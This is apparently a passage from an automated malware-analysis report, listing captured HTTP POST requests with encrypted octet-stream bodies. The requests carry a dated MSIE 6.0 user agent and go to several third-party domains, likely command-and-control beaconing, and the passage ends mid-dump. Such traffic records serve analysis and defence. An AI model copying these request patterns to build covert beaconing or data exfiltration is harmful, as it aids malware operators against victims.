46 75 35 4d 67 6e 35 61 64 32 64 34 65 73 35 42 39 38 41 75 50 30 46 4a 61 6b 41 44 76 79 76 48 74 67 6f 76 79 68 66 53 33 65 55 71 34 31 2b 56 54 35 38 75 64 59 52 67 47 37 43 69 51 51 48 5a 79 73 43 63 6a 76 65 47 37 6e 35 71 35 2f 41 52 51 72 69 5a 53 6a 44 6c 31 66 4f 32 69 73 43 38 61 6c 6a 37 75 32 78 62 43 56 56 47 39 63 4e 31 35 48 4d 68 52 73 4e 76 71 4b 78 71 56 63 75 49 72 5a 36 64 35 58 72 68 6f 49 49 63 77 50 4c 4c 45 7a 4b 78 34 56 34 4b 34 77 69 6a 64 6b 46 42 2f 6f 2f 72 30 47 79 66 6f 70 4c 70 79 56 6c 44 32 59 37 75 48 76 32 76 6c 30 45 4e 34 6c 43 59 6a 6f 74 6c 66 30 37 4d 4f 7a 73 33 59 74 51 4d 67 48 77 41 3d 3d Data Ascii: Nm8Ipapsv5gzWEV/jTQN4G3/6/Pase9lfuHNQHl4VN1Jlu5l9Gw/rrdgkBBpwaZDTQNeOYeymDHLdpgIB6H45GkQvMU4GCv6qvNqFEMh9haC6iU1SJpZopb56i7xH+ncRADGQIch9Ol3c3S2h/r6jK5nmQ3TcF/OAqviEfdiBqfSmJRMwzv9yT1M6JsHXoF1uEaGBbnH2DlqRnSiRho4TzJaTI9AK8YKvryPwABx/iaZGGMtPUsELYcIxiS4SPCNEWOEz0upf51Nbf+mtbj6SqNmN9T3N/iMMI8zsrmVW4VCjXrBe0F/t1K+JDCgmhV/iRPnYMFu5Mgn5ad2d4es5B98AuP0FJakADvyvHtgovyhfS3eUq41+VT58udYRgG7CiQQHZysCcjveG7n5q5/ARQriZSjDl1fO2isC8alj7u2xbCVVG9cN15HMhRsNvqKxqVcuIrZ6d5XrhoIIcwPLLEzKx4V4K4wijdkFB/o/r0GyfopLpyVlD2Y7uHv2vl0EN4lCYjotlf07MOzs3YtQMgHwA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 52 6b 2b 39 70 74 74 36 76 35 69 73 4d 2b 59 61 38 6e 4a 2b 53 4d 54 31 78 6e 70 68 62 6e 2f 78 50 79 4c 4d 75 31 39 6b 62 68 36 73 62 62 34 34 6b 51 63 49 44 6e 7a 69 6c 78 37 62 50 4c 2f 50 59 35 41 65 6a 6e 35 6b 4f 6d 74 49 63 43 35 4f 68 38 47 6c 34 46 73 48 52 75 6e 32 48 6a 4b 49 4d 64 31 4a 42 51 48 6f 2b 59 49 73 50 79 78 67 34 4f 59 2f 4b 52 30 61 48 44 34 45 6b 79 31 61 79 4c 32 64 36 64 61 50 68 47 62 74 7a 31 56 67 47 74 4c 70 70 74 31 42 61 30 78 71 31 30 62 42 72 79 56 6f 54 59 63 62 78 72 6e 74 66 6d 4c 67 39 39 57 48 77 2f 31 45 50 54 41 77 4e 4f 63 74 53 6b 69 68 31 55 4f 4f 6b 61 46 61 38 74 57 49 42 36 58 38 37 55 4c 77 32 72 4a 6a 6d 4f 4f 54 55 56 63 63 4e 6f 74 4b 47 41 5a 38 7a 76 4d 54 55 51 6c 78 45 62 35 46 7a 6e 2b 65 2b 55 42 59 72 70 72 6b 2b 2f 34 41 62 78 73 34 48 6e 70 71 68 71 45 44 4b 63 4e 79 2f 44 37 4a 78 65 77 6d 52 36 64 52 64 4b 4f 46 64 37 78 45 33 38 2b 46 4d 36 67 4d 44 58 43 72 64 75 76 63 57 62 73 72 46 67 72 44 74 42 43 45 31 37 38 45 42 74 72 6b 42 47 5a 59 63 51 62 57 65 46 2f 76 4c 43 51 4a 4c 41 42 7a 42 59 74 57 2f 76 67 47 35 71 59 48 39 4c 6f 74 54 37 5a 38 77 62 74 6d 35 57 44 2f 47 74 63 52 6c 41 38 56 54 55 6c 62 38 56 7a 51 38 37 59 44 68 74 43 45 52 72 4a 79 4e 59 48 4c 34 77 43 79 43 57 79 68 6b 49 75 72 4c 42 4c 79 77 49 4a 68 5a 55 49 45 79 4e 61 74 36 5a 6d 76 44 38 61 4d 2f 62 57 64 39 79 66 4d 39 74 46 66 76 70 7a 79 36 50 7a 4e 46 4e 6f 52 6b 50 6c 4a 6f 68 33 68 75 6f 76 4d 34 55 52 65 55 50 46 62 74 45 6f 2f 52 50 55 64 72 34 78 42 58 57 32 61 2f 61 71 6e 72 61 56 61 52 65 79 52 4c 41 69 71 38 65 50 45 4b 56 79 52 36 2b 73 38 49 38 30 58 Data Ascii: Rk+9ptt6v5isM+Ya8nJ+SMT1xnphbn/xPyLMu19kbh6sbb44kQcIDnzilx7bPL/PY5Aejn5kOmtIcC5Oh8Gl4FsHRun2HjKIMd1JBQHo+YIsPyxg4OY/KR0aHD4Eky1ayL2d6daPhGbtz1VgGtLppt1Ba0xq10bBryVoTYcbxrntfmLg99WHw/1EPTAwNOctSkih1UOOkaFa8tWIB6X87ULw2rJjmOOTUVccNotKGAZ8zvMTUQlxEb5Fzn+e+UBYrprk+/4Abxs4HnpqhqEDKcNy/D7JxewmR6dRdKOFd7xE38+FM6gMDXCrduvcWbsrFgrDtBCE178EBtrkBGZYcQbWeF/vLCQJLABzBYtW/vgG5qYH9LotT7Z8wbtm5WD/GtcRlA8VTUlb8VzQ87YDhtCERrJyNYHL4wCyCWyhkIurLBLywIJhZUIEyNat6ZmvD8aM/bWd9yfM9tFfvpzy6PzNFNoRkPlJoh3huovM4UReUPFbtEo/RPUdr4xBXW2a/aqnraVaReyRLAiq8ePEKVyR6+s8I80X
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 44 5a 67 34 43 63 33 39 79 70 6a 68 51 79 46 2f 52 49 54 69 71 49 5a 6a 58 77 67 37 32 56 45 77 55 61 76 63 69 30 38 49 53 42 68 72 71 42 7a 66 63 51 4e 71 62 66 4d 2f 6c 30 4f 42 35 74 4d 47 4d 54 54 35 68 6a 51 42 44 64 39 70 53 38 52 48 45 5a 64 48 52 43 49 56 39 53 6d 53 51 55 65 75 2f 4f 56 79 53 68 46 67 49 57 59 72 67 36 66 77 6c 68 69 79 78 53 50 4d 59 78 4d 32 43 33 30 32 5a 71 6b 6c 5a 6a 43 45 64 69 62 43 4b 74 4e 49 36 4b 5a 69 34 42 6a 42 78 51 41 42 31 50 67 41 48 4d 2b 72 72 76 4c 33 55 46 55 62 61 78 35 77 6d 6c 56 30 6d 43 6a 66 70 71 6c 30 7a 46 79 50 42 4d 4d 46 44 56 59 42 64 31 5a 42 4d 56 55 41 6a 30 5a 6c 6d 32 70 70 46 31 70 75 30 41 71 4b 75 42 4c 4b 4e 6a 52 78 4b 51 50 63 59 42 50 69 6d 37 38 76 52 6d 79 41 56 6b 79 33 71 5a 52 64 34 58 39 76 6a 32 54 43 2f 39 32 31 50 34 75 6a 31 73 78 6c 50 5a 78 77 32 6a 7a 43 65 37 38 2b 37 4a 76 65 58 53 78 6b 4c 65 67 50 78 74 43 4d 46 75 37 46 5a 67 6a 43 42 69 62 69 61 43 66 35 67 66 2f 6b 79 4c 42 6a 54 70 75 41 45 53 45 4b 57 57 44 54 75 4c 4c 43 37 55 71 69 32 32 51 44 37 38 70 46 79 77 79 42 4d 70 55 72 59 46 50 4d 46 6c 42 46 79 62 58 48 6a 2b 61 4d 35 54 47 4b 6d 67 51 37 72 73 46 6f 38 73 39 37 44 47 4f 6c 58 70 70 37 30 65 4e 6f 52 44 30 4c 4c 4c 53 62 42 6e 4d 38 66 44 4d 39 49 75 4e 59 75 6e 67 7a 4d 4a 6f 63 33 59 6e 73 59 58 4f 45 2f 79 50 63 46 7a 50 6a 36 78 51 79 62 38 4f 43 33 78 64 6f 57 6d 66 73 2f 56 35 65 74 4f 55 75 55 6f 63 43 4e 50 72 62 6d 49 72 2b 37 45 6b 72 71 45 52 44 53 39 49 42 48 42 39 47 64 4b 33 79 4a 59 53 45 76 4e 31 44 49 32 34 37 4c 42 2b 69 30 77 6d 56 70 54 6a 72 39 4c 34 6d 46 54 48 35 61 35 35 56 76 45 65 51 6d 75 69 73 53 55 6d 47 4c 61 77 57 63 79 50 4f 47 72 64 34 50 48 51 69 73 6f 65 47 53 48 6e 6a 38 6c 31 47 Data Ascii: DZg4Cc39ypjhQyF/RITiqIZjXwg72VEwUavci08ISBhrqBzfcQNqbfM/l0OB5tMGMTT5hjQBDd9pS8RHEZdHRCIV9SmSQUeu/OVyShFgIWYrg6fwlhiyxSPMYxM2C302ZqklZjCEdibCKtNI6KZi4BjBxQAB1PgAHM+rrvL3UFUbax5wmlV0mCjfpql0zFyPBMMFDVYBd1ZBMVUAj0Zlm2ppF1pu0AqKuBLKNjRxKQPcYBPim78vRmyAVky3qZRd4X9vj2TC/921P4uj1sxlPZxw2jzCe78+7JveXSxkLegPxtCMFu7FZgjCBibiaCf5gf/kyLBjTpuAESEKWWDTuLLC7Uqi22QD78pFywyBMpUrYFPMFlBFybXHj+aM5TGKmgQ7rsFo8s97DGOlXpp70eNoRD0LLLSbBnM8fDM9IuNYungzMJoc3YnsYXOE/yPcFzPj6xQyb8OC3xdoWmfs/V5etOUuUocCNPrbmIr+7EkrqERDS9IBHB9GdK3yJYSEvN1DI247LB+i0wmVpTjr9L4mFTH5a55VvEeQmuisSUmGLawWcyPOGrd4PHQisoeGSHnj8l1G
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 43 58 45 4c 70 63 52 73 76 35 6a 52 61 51 68 45 33 35 47 68 34 70 64 6b 70 55 2f 38 68 46 6f 7a 4f 47 34 75 4e 31 6a 71 70 72 77 51 45 41 79 6d 48 74 72 49 58 4d 61 6b 71 58 44 77 75 2b 74 4b 36 55 75 61 63 2f 56 6c 57 69 56 44 50 39 53 76 6d 50 55 78 77 70 77 34 4d 4d 47 67 76 67 37 51 56 72 61 59 6a 48 54 7a 45 38 52 7a 30 49 47 2f 31 38 56 66 66 54 53 68 7a 62 33 42 73 61 48 52 6f 43 63 4e 52 5a 2b 6d 69 6d 65 5a 52 77 6a 46 71 41 31 2f 57 66 36 30 51 32 41 36 6f 41 53 69 31 7a 6a 31 76 4f 32 44 31 63 69 5a 71 7a 6c 57 42 32 54 30 4a 33 49 53 5a 5a 56 68 71 63 52 6c 51 38 69 52 44 33 78 4b 6d 6c 39 50 30 6c 57 35 78 4c 53 52 45 6b 6d 61 34 73 31 76 57 6e 62 55 75 4e 64 33 73 5a 49 31 66 43 58 6e 7a 30 49 66 54 53 6a 78 46 45 6b 77 72 62 46 75 6b 50 6e 32 7a 79 63 55 65 54 78 69 75 77 68 48 50 41 71 71 33 79 6c 5a 65 5a 46 46 54 75 48 38 62 43 74 68 38 55 6a 44 4b 59 56 69 35 64 66 70 77 33 6a 6f 51 56 4f 6d 47 49 47 44 72 5a 72 53 38 48 67 38 74 48 59 31 69 49 43 41 33 39 78 33 46 72 33 61 5a 69 79 52 32 53 51 56 69 65 70 39 71 75 49 75 72 70 62 51 70 44 41 6b 37 57 63 53 4d 52 36 47 39 47 52 67 71 75 48 6e 45 31 31 38 31 58 30 74 6f 6a 62 57 6a 46 78 78 6e 55 74 35 4e 55 4e 6e 42 6d 42 39 62 51 6a 35 39 2f 51 66 74 50 51 50 48 32 42 36 63 4a 42 51 69 59 33 7a 77 2f 76 66 51 45 68 33 79 32 6b 34 4d 58 34 30 53 4f 73 31 4d 78 48 6a 75 72 2f 68 4c 31 50 4d 35 70 58 78 2b 49 64 59 73 59 70 6e 63 37 33 58 73 67 39 79 55 5a 72 62 33 74 44 65 6f 44 68 76 4a 6a 2f 58 77 50 79 7a 54 66 65 63 30 44 33 54 52 64 74 4e 6c 54 33 42 77 43 37 4b 65 46 78 66 6a 75 74 45 71 62 69 5a 39 37 76 47 45 49 4c 54 Data Ascii: CXELpcRsv5jRaQhE35Gh4pdkpU/8hFozOG4uN1jqprwQEAymHtrIXMakqXDwu+tK6Uuac/VlWiVDP9SvmPUxwpw4MMGgvg7QVraYjHTzE8Rz0IG/18VffTShzb3BsaHRoCcNRZ+mimeZRwjFqA1/Wf60Q2A6oASi1zj1vO2D1ciZqzlWB2T0J3ISZZVhqcRlQ8iRD3xKml9P0lW5xLSREkma4s1vWnbUuNd3sZI1fCXnz0IfTSjxFEkwrbFukPn2zycUeTxiuwhHPAqq3ylZeZFFTuH8bCth8UjDKYVi5dfpw3joQVOmGIGDrZrS8Hg8tHY1iICA39x3Fr3aZiyR2SQViep9quIurpbQpDAk7WcSMR6G9GRgquHnE1181X0tojbWjFxxnUt5NUNnBmB9bQj59/QftPQPH2B6cJBQiY3zw/vfQEh3y2k4MX40SOs1MxHjur/hL1PM5pXx+IdYsYpnc73Xsg9yUZrb3tDeoDhvJj/XwPyzTfec0D3TRdtNlT3BwC7KeFxfjutEqbiZ97vGEILT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 4b 62 47 6c 31 6d 4a 5a 79 5a 67 65 30 34 4c 6c 31 59 6e 58 38 75 56 67 79 39 76 79 75 47 30 58 74 73 58 2b 6c 59 5a 72 4f 6f 70 7a 45 32 30 73 7a 38 71 59 31 47 77 39 68 43 65 32 6d 79 2b 6e 6d 34 34 4b 61 46 57 6f 75 67 6a 72 4c 6e 2f 6b 36 6a 41 44 74 57 73 4a 77 30 39 30 4c 44 79 32 71 47 61 47 36 48 49 74 63 41 52 57 31 48 38 58 68 76 41 47 4b 4f 5a 4d 34 59 39 34 57 4a 4b 72 64 38 43 31 72 4b 76 52 4f 44 59 4b 77 78 69 74 35 35 43 74 6c 47 61 68 66 58 6d 6c 36 4b 63 79 6d 42 38 4f 66 63 58 4d 4c 4e 52 67 6b 47 67 65 6a 2f 7a 46 70 2b 77 66 72 49 48 37 4d 50 74 7a 6b 74 6e 4e 62 77 71 34 36 38 31 46 62 71 57 33 2f 2b 44 4e 32 45 37 53 6d 42 43 56 76 37 34 47 56 54 48 46 4f 57 4f 77 54 58 45 41 51 45 45 2b 67 45 63 5a 77 6e 6a 72 4a 47 6d 75 48 72 62 53 45 34 4b 4e 76 46 79 5a 4d 7a 73 56 52 56 4c 53 71 62 56 6e 39 38 6c 57 35 56 57 57 4c 77 31 34 6f 65 49 6b 33 35 38 6c 53 4a 49 45 47 46 61 57 55 51 32 51 54 61 57 47 50 69 5a 49 6d 57 48 4c 52 75 73 45 78 75 4e 70 44 6f 63 65 44 4e 65 68 4e 6c 4f 4a 74 33 32 47 32 4a 7a 62 65 56 5a 33 44 4f 4c 58 77 4d 34 4c 39 6b 52 51 79 75 4c 73 4c 45 35 72 50 36 34 57 69 49 39 77 6e 67 31 49 45 58 65 54 77 72 41 33 6b 76 75 39 44 67 6e 6f 46 74 2f 6f 2f 30 36 6d 56 5a 38 2f 72 33 63 5a 55 68 4b 44 66 31 51 44 44 5a 49 75 77 4d 74 49 42 66 6d 62 75 4d 69 48 74 6f 36 43 33 30 50 51 56 64 34 72 6c 35 46 7a 4e 76 36 34 68 66 53 31 35 56 45 65 49 34 66 56 4b 62 4b 53 72 6a 37 4d 63 42 78 74 6d 39 66 79 38 57 46 30 58 70 6c 39 6d 4e 37 46 50 58 37 6f 71 4f 72 32 6f 68 53 4a 54 42 41 55 72 39 65 51 57 47 65 2f 43 6c 38 2b 5a 54 75 33 6f 4a 6e 69 42 64 34 73 74 53 69 36 5a 41 3d 3d Data Ascii: KbGl1mJZyZge04Ll1YnX8uVgy9vyuG0XtsX+lYZrOopzE20sz8qY1Gw9hCe2my+nm44KaFWougjrLn/k6jADtWsJw090LDy2qGaG6HItcARW1H8XhvAGKOZM4Y94WJKrd8C1rKvRODYKwxit55CtlGahfXml6KcymB8OfcXMLNRgkGgej/zFp+wfrIH7MPtzktnNbwq4681FbqW3/+DN2E7SmBCVv74GVTHFOWOwTXEAQEE+gEcZwnjrJGmuHrbSE4KNvFyZMzsVRVLSqbVn98lW5VWWLw14oeIk358lSJIEGFaWUQ2QTaWGPiZImWHLRusExuNpDoceDNehNlOJt32G2JzbeVZ3DOLXwM4L9kRQyuLsLE5rP64WiI9wng1IEXeTwrA3kvu9DgnoFt/o/06mVZ8/r3cZUhKDf1QDDZIuwMtIBfmbuMiHto6C30PQVd4rl5FzNv64hfS15VEeI4fVKbKSrj7McBxtm9fy8WF0Xpl9mN7FPX7oqOr2ohSJTBAUr9eQWGe/Cl8+ZTu3oJniBd4stSi6ZA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 4b 4b 75 36 30 62 79 41 30 5a 68 45 54 48 49 55 5a 32 53 35 43 6b 2b 33 41 59 46 55 56 47 41 73 73 45 57 6f 75 65 31 55 4e 68 61 72 6f 32 5a 6d 39 5a 78 71 54 46 43 47 53 56 33 6c 62 65 74 42 54 4e 46 44 4e 33 2f 4f 31 45 51 74 75 44 44 69 51 30 41 61 33 64 42 65 63 58 39 73 73 4c 4c 58 6d 73 33 62 42 36 4b 67 4b 4b 56 50 4c 7a 2b 2f 55 74 65 4a 71 51 56 71 42 48 2f 77 4e 63 46 54 6a 4e 74 6c 47 30 33 41 4b 34 63 57 43 4a 64 2f 58 77 75 45 58 34 72 34 53 77 39 41 73 58 6f 57 6e 55 52 6d 47 38 38 4f 58 46 43 64 4e 36 65 4f 79 4d 52 42 53 4a 52 39 59 70 2f 4c 64 75 78 74 74 51 66 47 78 72 2b 7a 73 4c 6d 2f 42 65 30 6c 55 55 34 4c 48 4a 59 4d 44 61 42 64 53 4f 36 75 62 79 66 5a 62 7a 32 75 4d 56 50 53 59 35 73 53 36 74 75 30 44 45 53 67 53 4a 31 6c 7a 79 57 6f 52 57 6e 66 33 57 33 30 75 2b 66 43 66 65 78 58 2f 71 33 46 42 52 6a 46 59 31 4e 65 34 30 2b 4e 56 6f 65 64 78 55 58 44 67 6f 77 6c 6b 37 63 4c 57 55 51 78 42 6f 45 5a 78 4e 7a 34 53 48 43 6d 2f 56 66 4d 38 34 4a 44 50 79 6e 54 34 36 2f 32 6d 51 75 38 55 35 68 6e 74 2b 6f 71 4c 53 55 4f 76 67 4b 4b 30 64 62 67 39 50 78 41 65 5a 59 30 52 58 77 4e 79 4c 43 55 4d 70 4c 4f 41 4b 43 31 6c 73 65 6a 6e 43 4b 6d 57 54 47 33 70 47 6b 69 2f 36 32 76 57 4f 6b 74 79 71 58 4f 54 58 74 71 75 4f 63 47 35 45 77 43 71 56 53 70 30 62 49 71 31 78 6b 66 49 69 30 78 55 6f 62 37 54 4f 5a 66 6e 52 49 32 49 52 63 62 33 32 4a 4d 65 4a 2f 72 56 71 53 2f 73 54 6a 52 4d 32 32 59 73 34 4e 4b 4f 6b 68 50 2b 69 30 70 38 38 56 6d 43 6c 4b 50 6c 42 42 4d 75 66 69 70 4f 39 68 75 32 78 65 67 6a 35 73 51 49 72 41 76 4c 37 52 39 65 57 59 73 4b 79 77 4b 73 43 65 43 39 51 4e 44 76 7a 78 71 4f 75 6e 50 4e 55 4d 6b 32 49 4b 53 64 70 69 53 78 59 52 38 46 49 75 69 35 47 73 3d Data Ascii: KKu60byA0ZhETHIUZ2S5Ck+3AYFUVGAssEWoue1UNharo2Zm9ZxqTFCGSV3lbetBTNFDN3/O1EQtuDDiQ0Aa3dBecX9ssLLXms3bB6KgKKVPLz+/UteJqQVqBH/wNcFTjNtlG03AK4cWCJd/XwuEX4r4Sw9AsXoWnURmG88OXFCdN6eOyMRBSJR9Yp/LduxttQfGxr+zsLm/Be0lUU4LHJYMDaBdSO6ubyfZbz2uMVPSY5sS6tu0DESgSJ1lzyWoRWnf3W30u+fCfexX/q3FBRjFY1Ne40+NVoedxUXDgowlk7cLWUQxBoEZxNz4SHCm/VfM84JDPynT46/2mQu8U5hnt+oqLSUOvgKK0dbg9PxAeZY0RXwNyLCUMpLOAKC1lsejnCKmWTG3pGki/62vWOktyqXOTXtquOcG5EwCqVSp0bIq1xkfIi0xUob7TOZfnRI2IRcb32JMeJ/rVqS/sTjRM22Ys4NKOkhP+i0p88VmClKPlBBMufipO9hu2xegj5sQIrAvL7R9eWYsKywKsCeC9QNDvzxqOunPNUMk2IKSdpiSxYR8FIui5Gs=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 50 79 6e 37 47 5a 73 70 33 4a 6a 65 75 52 4b 48 73 74 4a 54 79 49 52 57 67 31 59 68 56 4d 51 31 2f 32 52 36 42 72 58 6d 6c 77 44 73 32 68 31 77 38 57 73 62 54 55 58 32 35 59 71 46 54 73 52 6c 67 4b 72 65 77 6a 6b 6a 6d 66 71 66 79 68 61 31 4f 7a 4c 72 38 78 50 4a 4a 45 68 76 46 62 2f 57 77 77 74 57 73 62 61 76 4f 62 38 77 68 34 2b 6b 42 76 4f 71 64 42 2b 30 50 6c 7a 75 52 61 39 58 79 49 61 46 64 74 6f 6a 54 6a 2f 53 5a 4c 42 62 4d 45 52 6a 39 39 44 6d 35 47 54 66 4d 78 59 50 7a 39 43 35 48 65 73 64 51 4e 6c 75 64 76 31 38 76 6d 33 36 4b 6e 36 4c 74 55 69 32 79 51 4a 74 42 51 57 54 70 35 4b 67 7a 62 31 56 70 63 32 39 50 69 4a 63 67 34 34 31 37 32 74 52 50 38 6e 46 32 6f 74 38 45 4c 36 75 52 6b 35 35 66 73 44 4b 46 5a 2f 41 57 6d 68 38 4a 2b 52 35 4f 6e 38 69 31 30 62 57 70 41 4e 34 75 72 51 61 31 31 48 55 4f 6d 48 31 34 54 66 6a 6e 57 78 38 59 71 4b 54 41 41 2b 56 57 7a 6a 73 34 38 48 71 4b 4b 51 78 7a 36 70 79 6d 46 2f 72 61 4c 5a 6b 6e 4c 68 50 67 32 43 65 4c 5a 49 79 36 6c 6d 68 57 32 72 4d 54 36 6b 34 45 46 36 34 32 77 4a 77 7a 4b 4f 55 6b 30 65 36 59 69 39 4c 67 31 63 32 77 61 6e 38 6e 4f 55 77 48 55 7a 62 4e 59 5a 45 5a 34 65 57 62 6f 72 67 6f 65 50 4f 76 58 53 52 58 35 6d 73 46 78 50 61 57 6b 57 46 68 32 36 64 41 4c 66 66 57 54 71 33 77 49 4a 55 69 32 2f 72 6d 56 64 74 44 6c 44 31 2f 52 4c 79 75 65 74 71 72 38 57 47 4d 50 4a 61 6e 43 4c 6e 36 71 77 34 6f 56 34 30 6c 6d 50 42 34 68 6e 51 48 38 72 35 50 2f 71 4f 57 54 55 47 79 64 71 6f 78 52 75 46 42 39 56 58 6d 6b 49 49 64 49 33 33 39 30 54 55 78 54 36 70 68 2b 59 2f 50 43 41 56 44 4a 64 47 6d 79 55 56 39 48 32 78 4d 52 6e 79 6d 6e 31 39 70 4a 4d 33 65 6f 4f 70 4c 74 43 6b 47 7a 76 44 72 44 38 72 42 77 3d 3d Data Ascii: Pyn7GZsp3JjeuRKHstJTyIRWg1YhVMQ1/2R6BrXmlwDs2h1w8WsbTUX25YqFTsRlgKrewjkjmfqfyha1OzLr8xPJJEhvFb/WwwtWsbavOb8wh4+kBvOqdB+0PlzuRa9XyIaFdtojTj/SZLBbMERj99Dm5GTfMxYPz9C5HesdQNludv18vm36Kn6LtUi2yQJtBQWTp5Kgzb1Vpc29PiJcg44172tRP8nF2ot8EL6uRk55fsDKFZ/AWmh8J+R5On8i10bWpAN4urQa11HUOmH14TfjnWx8YqKTAA+VWzjs48HqKKQxz6pymF/raLZknLhPg2CeLZIy6lmhW2rMT6k4EF642wJwzKOUk0e6Yi9Lg1c2wan8nOUwHUzbNYZEZ4eWborgoePOvXSRX5msFxPaWkWFh26dALffWTq3wIJUi2/rmVdtDlD1/RLyuetqr8WGMPJanCLn6qw4oV40lmPB4hnQH8r5P/qOWTUGydqoxRuFB9VXmkIIdI3390TUxT6ph+Y/PCAVDJdGmyUV9H2xMRnymn19pJM3eoOpLtCkGzvDrD8rBw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 4f 77 79 43 30 4a 56 32 30 5a 69 37 68 6e 5a 7a 66 46 62 65 43 49 37 2f 7a 4d 4f 6a 70 64 57 64 6d 56 51 4b 68 56 33 63 32 44 57 43 43 62 67 72 45 5a 4b 68 54 37 76 32 46 4f 37 6d 6e 36 30 77 49 55 61 67 41 44 67 77 45 70 5a 5a 68 68 7a 37 66 66 77 55 71 6a 35 57 32 74 71 57 67 54 72 2b 32 33 51 4d 4d 79 69 44 48 33 66 71 47 4e 47 6d 54 34 4f 67 56 42 74 41 34 46 62 58 6b 4e 52 6f 77 51 6f 35 61 4b 36 49 6c 42 37 50 77 52 2f 74 33 41 54 4b 33 55 37 33 57 32 48 31 47 57 31 36 73 7a 76 57 58 6a 76 36 73 4c 71 65 6a 65 39 33 76 30 68 41 37 72 31 64 52 70 76 41 58 73 5a 41 42 4f 33 59 73 59 42 4f 2b 62 79 62 2f 78 6c 66 49 39 6c 57 4d 64 66 65 6f 36 33 36 4a 70 61 36 67 64 5a 4b 46 33 73 6a 31 70 64 64 7a 68 68 64 73 31 35 67 70 37 73 56 4b 4b 57 42 43 2b 4a 75 4b 35 64 57 36 4e 32 78 2f 30 4f 30 35 78 56 59 54 37 64 73 2b 6c 6a 44 6e 48 6a 34 44 48 2f 6c 66 46 64 67 30 64 37 42 79 41 6a 45 74 2b 58 71 74 37 6c 34 4d 31 31 6f 70 73 35 73 43 54 34 6e 4c 69 54 49 64 38 4a 30 45 7a 6e 54 42 6c 36 6b 4f 39 65 63 4b 70 5a 36 65 6b 47 64 6c 39 73 65 67 6c 32 30 6c 74 48 33 35 51 45 4a 78 42 66 63 6e 55 6c 7a 4c 72 46 76 65 76 4d 46 32 73 5a 78 43 50 2b 71 63 30 70 7a 32 4b 72 49 4c 4b 6e 62 62 4a 72 5a 74 66 37 68 42 58 30 59 4d 43 7a 70 37 59 76 71 61 42 32 54 51 5a 4b 45 62 4f 30 72 39 64 43 43 6f 45 57 72 34 71 67 47 5a 76 56 70 77 55 52 2b 53 67 6a 72 4a 62 2f 35 59 7a 34 4c 70 67 6d 68 46 65 39 68 48 4d 4f 31 32 61 7a 44 51 52 64 45 41 38 34 75 62 35 55 70 65 70 43 75 53 30 71 54 6f 38 7a 36 70 63 79 34 2f 5a 31 64 39 30 2f 6c 7a 58 6c 4f 74 69 65 57 56 43 7a 72 57 75 48 76 45 65 42 36 45 51 46 76 36 6f 4c 76 55 69 67 2f 6c 6c 74 74 74 75 69 36 70 47 6e 48 2b 36 54 63 61 66 77 4b Data Ascii: OwyC0JV20Zi7hnZzfFbeCI7/zMOjpdWdmVQKhV3c2DWCCbgrEZKhT7v2FO7mn60wIUagADgwEpZZhhz7ffwUqj5W2tqWgTr+23QMMyiDH3fqGNGmT4OgVBtA4FbXkNRowQo5aK6IlB7PwR/t3ATK3U73W2H1GW16szvWXjv6sLqeje93v0hA7r1dRpvAXsZABO3YsYBO+byb/xlfI9lWMdfeo636Jpa6gdZKF3sj1pddzhhds15gp7sVKKWBC+JuK5dW6N2x/0O05xVYT7ds+ljDnHj4DH/lfFdg0d7ByAjEt+Xqt7l4M11ops5sCT4nLiTId8J0EznTBl6kO9ecKpZ6ekGdl9segl20ltH35QEJxBfcnUlzLrFvevMF2sZxCP+qc0pz2KrILKnbbJrZtf7hBX0YMCzp7YvqaB2TQZKEbO0r9dCCoEWr4qgGZvVpwUR+SgjrJb/5Yz4LpgmhFe9hHMO12azDQRdEA84ub5UpepCuS0qTo8z6pcy4/Z1d90/lzXlOtieWVCzrWuHvEeB6EQFv6oLvUig/lltttui6pGnH+6TcafwK
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 43 58 45 4c 70 63 52 73 76 35 6a 52 61 51 68 45 33 35 47 68 34 70 64 6b 70 55 2f 38 68 46 6f 7a 4f 47 34 75 4e 31 6a 71 70 72 77 51 45 41 79 6d 48 74 72 49 58 4d 61 6b 71 58 44 77 75 2b 74 4b 36 55 75 61 63 2f 56 6c 57 69 56 44 50 39 53 76 6d 50 55 78 77 70 77 34 4d 4d 47 67 76 67 37 51 56 72 61 59 6a 48 54 7a 45 38 52 7a 30 49 47 2f 31 38 56 66 66 54 53 68 7a 62 33 42 73 61 48 52 6f 43 63 4e 52 5a 2b 6d 69 6d 65 5a 52 77 6a 46 71 41 31 2f 57 66 36 30 51 32 41 